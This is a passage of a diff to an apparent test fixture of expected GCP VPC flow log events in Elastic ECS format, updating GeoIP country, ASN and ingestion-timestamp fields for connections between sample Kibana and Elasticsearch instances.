019-06-14T03:40:05.147072949Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", "kind": "event", "start": "2019-06-14T03:40:05.147072949Z", @@ -3863,11 +4049,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33694, @@ -3939,7 +4130,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391360500Z", + "ingested": "2021-12-14T14:43:27.415192470Z", "original": "{\"insertId\":\"1ulp77rfdvho63\",\"jsonPayload\":{\"bytes_sent\":\"59903\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33694},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565117754Z\",\"packets_sent\":\"353\",\"reporter\":\"DEST\",\"rtt_msec\":\"216\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:05.566551903Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", "kind": "event", "start": "2019-06-14T03:40:05.566551903Z", @@ -3950,16 +4141,51 @@ } }, { + "@timestamp": "2019-06-14T03:50:11.981Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "10.87.40.76", + "67.43.156.14" + ] + }, "log": { "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" }, + "gcp": { + "vpcflow": { + "reporter": "SRC", + "rtt": { + "ms": 36 + } + }, + "source": { + "vpc": { + "project_id": "my-sample-project", + "subnetwork_name": "default", + "vpc_name": "default" + }, + "instance": { + "region": "us-east1", + "project_id": "my-sample-project", + "zone": "us-east1-b" + } + } + }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 33924, @@ -3973,6 +4199,16 @@ "domain": "kibana", "ip": "10.87.40.76" }, + "event": { + "ingested": "2021-12-14T14:43:27.415192858Z", + "original": "{\"insertId\":\"1ulp77rfdvho4r\",\"jsonPayload\":{\"bytes_sent\":\"1780\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":33924,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:46:20.745658276Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:46:20.634545217Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", + "kind": "event", + "start": "2019-06-14T03:46:20.634545217Z", + "end": "2019-06-14T03:46:20.745658276Z", + "id": "1ulp77rfdvho4r", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -3984,22 +4220,27 @@ "iana_number": "6", "packets": 7, "direction": "outbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:11.981Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "10.87.40.76", - "67.43.156.14" + "10.139.99.242", + "67.43.156.13" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "vpcflow": { "reporter": "SRC", "rtt": { - "ms": 36 + "ms": 89 } }, "source": { @@ -4015,30 +4256,18 @@ } } }, - "event": { - "ingested": "2021-12-09T13:37:46.391364700Z", - "original": "{\"insertId\":\"1ulp77rfdvho4r\",\"jsonPayload\":{\"bytes_sent\":\"1780\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":33924,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:46:20.745658276Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:46:20.634545217Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", - "kind": "event", - "start": "2019-06-14T03:46:20.634545217Z", - "end": "2019-06-14T03:46:20.745658276Z", - "id": "1ulp77rfdvho4r", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa", - "city_name": "Broomfield", - "region_name": "Colorado" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 33652 + "number": 35908 }, "address": "67.43.156.13", "port": 65271, @@ -4052,6 +4281,16 @@ "domain": "elasticsearch", "ip": "10.139.99.242" }, + "event": { + "ingested": "2021-12-14T14:43:27.415193246Z", + "original": "{\"insertId\":\"1ulp77rfdvho4i\",\"jsonPayload\":{\"bytes_sent\":\"129335\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":65271,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:55.318940798Z\",\"packets_sent\":\"605\",\"reporter\":\"SRC\",\"rtt_msec\":\"89\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.155378070Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", + "kind": "event", + "start": "2019-06-14T03:40:00.155378070Z", + "end": "2019-06-14T03:49:55.318940798Z", + "id": "1ulp77rfdvho4i", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -4063,25 +4302,24 @@ "iana_number": "6", "packets": 605, "direction": "outbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:11.981Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "10.139.99.242", - "67.43.156.13" + "192.168.2.117", + "10.87.40.76" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { - "vpcflow": { - "reporter": "SRC", - "rtt": { - "ms": 89 - } - }, - "source": { + "destination": { "vpc": { "project_id": "my-sample-project", "subnetwork_name": "default", @@ -4092,23 +4330,14 @@ "project_id": "my-sample-project", "zone": "us-east1-b" } + }, + "vpcflow": { + "reporter": "DEST", + "rtt": { + "ms": 36 + } } }, - "event": { - "ingested": "2021-12-09T13:37:46.391369300Z", - "original": "{\"insertId\":\"1ulp77rfdvho4i\",\"jsonPayload\":{\"bytes_sent\":\"129335\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":65271,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:55.318940798Z\",\"packets_sent\":\"605\",\"reporter\":\"SRC\",\"rtt_msec\":\"89\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.155378070Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", - "kind": "event", - "start": "2019-06-14T03:40:00.155378070Z", - "end": "2019-06-14T03:49:55.318940798Z", - "id": "1ulp77rfdvho4i", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "address": "10.87.40.76", "port": 5601, @@ -4129,6 +4358,16 @@ "ip": "192.168.2.117", "packets": 7 }, + "event": { + "ingested": "2021-12-14T14:43:27.415193638Z", + "original": "{\"insertId\":\"1ulp77rfdvho5v\",\"jsonPayload\":{\"bytes_sent\":\"1464\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"192.168.2.117\",\"src_port\":33862},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:46:11.779780615Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:46:11.655143526Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", + "kind": "event", + "start": "2019-06-14T03:46:11.655143526Z", + "end": "2019-06-14T03:46:11.779780615Z", + "id": "1ulp77rfdvho5v", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -4140,17 +4379,22 @@ "iana_number": "6", "packets": 7, "direction": "inbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:11.981Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "192.168.2.117", - "10.87.40.76" + "67.43.156.13", + "10.139.99.242" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "destination": { "vpc": { @@ -4167,25 +4411,10 @@ "vpcflow": { "reporter": "DEST", "rtt": { - "ms": 36 + "ms": 219 } } }, - "event": { - "ingested": "2021-12-09T13:37:46.391374100Z", - "original": "{\"insertId\":\"1ulp77rfdvho5v\",\"jsonPayload\":{\"bytes_sent\":\"1464\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"192.168.2.117\",\"src_port\":33862},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:46:11.779780615Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:46:11.655143526Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", - "kind": "event", - "start": "2019-06-14T03:46:11.655143526Z", - "end": "2019-06-14T03:46:11.779780615Z", - "id": "1ulp77rfdvho5v", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "address": "10.139.99.242", "port": 9200, @@ -4194,13 +4423,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa", - "city_name": "Broomfield", - "region_name": "Colorado" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 33652 + "number": 35908 }, "address": "67.43.156.13", "port": 65321, @@ -4208,6 +4440,16 @@ "ip": "67.43.156.13", "packets": 737 }, + "event": { + "ingested": "2021-12-14T14:43:27.415194027Z", + "original": "{\"insertId\":\"1ulp77rfdvho5i\",\"jsonPayload\":{\"bytes_sent\":\"75477\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":65321},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.312105537Z\",\"packets_sent\":\"737\",\"reporter\":\"DEST\",\"rtt_msec\":\"219\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:39:59.843986502Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", + "kind": "event", + "start": "2019-06-14T03:39:59.843986502Z", + "end": "2019-06-14T03:49:56.312105537Z", + "id": "1ulp77rfdvho5i", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -4219,19 +4461,30 @@ "iana_number": "6", "packets": 737, "direction": "inbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:11.981Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "67.43.156.13", - "10.139.99.242" + "10.139.99.242", + "67.43.156.13" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { - "destination": { + "vpcflow": { + "reporter": "SRC", + "rtt": { + "ms": 86 + } + }, + "source": { "vpc": { "project_id": "my-sample-project", "subnetwork_name": "default", @@ -4242,38 +4495,20 @@ "project_id": "my-sample-project", "zone": "us-east1-b" } - }, - "vpcflow": { - "reporter": "DEST", - "rtt": { - "ms": 219 - } } }, - "event": { - "ingested": "2021-12-09T13:37:46.391379600Z", - "original": "{\"insertId\":\"1ulp77rfdvho5i\",\"jsonPayload\":{\"bytes_sent\":\"75477\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":65321},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.312105537Z\",\"packets_sent\":\"737\",\"reporter\":\"DEST\",\"rtt_msec\":\"219\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:39:59.843986502Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", - "kind": "event", - "start": "2019-06-14T03:39:59.843986502Z", - "end": "2019-06-14T03:49:56.312105537Z", - "id": "1ulp77rfdvho5i", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa", - "city_name": "Broomfield", - "region_name": "Colorado" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 33652 + "number": 35908 }, "address": "67.43.156.13", "port": 65316, @@ -4287,6 +4522,16 @@ "domain": "elasticsearch", "ip": "10.139.99.242" }, + "event": { + "ingested": "2021-12-14T14:43:27.415194452Z", + "original": "{\"insertId\":\"1ulp77rfdvho5c\",\"jsonPayload\":{\"bytes_sent\":\"102119\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":65316,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.220838853Z\",\"packets_sent\":\"600\",\"reporter\":\"SRC\",\"rtt_msec\":\"86\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.565831992Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", + "kind": "event", + "start": "2019-06-14T03:40:00.565831992Z", + "end": "2019-06-14T03:49:56.220838853Z", + "id": "1ulp77rfdvho5c", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -4298,46 +4543,6 @@ "iana_number": "6", "packets": 600, "direction": "outbound" - }, - "@timestamp": "2019-06-14T03:50:11.981Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "10.139.99.242", - "67.43.156.13" - ] - }, - "gcp": { - "vpcflow": { - "reporter": "SRC", - "rtt": { - "ms": 86 - } - }, - "source": { - "vpc": { - "project_id": "my-sample-project", - "subnetwork_name": "default", - "vpc_name": "default" - }, - "instance": { - "region": "us-east1", - "project_id": "my-sample-project", - "zone": "us-east1-b" - } - } - }, - "event": { - "ingested": "2021-12-09T13:37:46.391385Z", - "original": "{\"insertId\":\"1ulp77rfdvho5c\",\"jsonPayload\":{\"bytes_sent\":\"102119\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":65316,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.220838853Z\",\"packets_sent\":\"600\",\"reporter\":\"SRC\",\"rtt_msec\":\"86\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.565831992Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", - "kind": "event", - "start": "2019-06-14T03:40:00.565831992Z", - "end": "2019-06-14T03:49:56.220838853Z", - "id": "1ulp77rfdvho5c", - "category": "network", - "type": "connection" } }, { @@ -4352,11 +4557,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 49680, @@ -4428,7 +4638,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391390400Z", + "ingested": "2021-12-14T14:43:27.415194887Z", "original": "{\"insertId\":\"1ulp77rfdvho5p\",\"jsonPayload\":{\"bytes_sent\":\"1541638\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":49680},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:55.705469925Z\",\"packets_sent\":\"949\",\"reporter\":\"DEST\",\"rtt_msec\":\"113\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"siem-windows\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"windows-isolated\",\"vpc_name\":\"windows-isolated\"},\"start_time\":\"2019-06-14T03:39:59.711043814Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", "kind": "event", "start": "2019-06-14T03:39:59.711043814Z", @@ -4526,7 +4736,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391396100Z", + "ingested": "2021-12-14T14:43:27.415195396Z", "original": "{\"insertId\":\"1ulp77rfdvho4y\",\"jsonPayload\":{\"bytes_sent\":\"755901\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"192.168.2.177\",\"src_port\":60112},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:18.224268993Z\",\"packets_sent\":\"227\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-central1\",\"vm_name\":\"suricata-iowa\",\"zone\":\"us-central1-a\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:14.031541248Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", "kind": "event", "start": "2019-06-14T03:40:14.031541248Z", @@ -4542,11 +4752,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33558, @@ -4624,7 +4839,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391401600Z", + "ingested": "2021-12-14T14:43:27.415195783Z", "original": "{\"insertId\":\"1ulp77rfdvho4o\",\"jsonPayload\":{\"bytes_sent\":\"248715\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33558,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.394676451Z\",\"packets_sent\":\"270\",\"reporter\":\"SRC\",\"rtt_msec\":\"144\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:58.492572765Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", "kind": "event", "start": "2019-06-14T03:39:58.492572765Z", @@ -4635,9 +4850,39 @@ } }, { + "@timestamp": "2019-06-14T03:50:11.981Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "67.43.156.13", + "10.139.99.242" + ] + }, "log": { "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" }, + "gcp": { + "destination": { + "vpc": { + "project_id": "my-sample-project", + "subnetwork_name": "default", + "vpc_name": 